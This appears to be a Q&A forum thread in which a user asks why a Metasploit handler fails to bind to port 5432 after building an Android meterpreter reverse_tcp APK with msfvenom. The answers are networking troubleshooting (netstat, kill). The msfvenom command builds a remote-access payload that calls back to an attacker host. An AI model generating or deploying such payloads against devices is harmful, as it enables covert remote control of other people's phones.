# When I try to exploit my payload then it is showing me, no session was created

Tags: root, metasploit, termux

When I try to exploit my payload then it is showing me...

Handler failed to bind to YOUR IP:-  -

[-] Handler failed to bind to 0.0.0.0:5432:-  -

[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:5432).

[*] Exploit completed, but no session was created.

//////////////////

command to make payload

./msfvenom -p android/meterpreter/reverse_tcp LHOST=YOUR IP LPORT=5432 -o ~/storage/downloads/test2.apk

sir please help me!!!

Thanks for see/read my post

Answer (score 0):

My guess you need to use a loopback address 127.0.0.1 and not any address

Answer (score 0):

I think,there is another service or anything running on port 5432.You should check it with netstat command.You can set another port number.

Answer (score 0):

to find wich process is using that port use:

```
netstat -nao | grep 5432

TCP    127.0.0.1:5432      0.0.0.0:0    LISTENING   [PID]
```

then you can kill that process using the **PID** returned from the last command:

```
kill -9 <PID>
```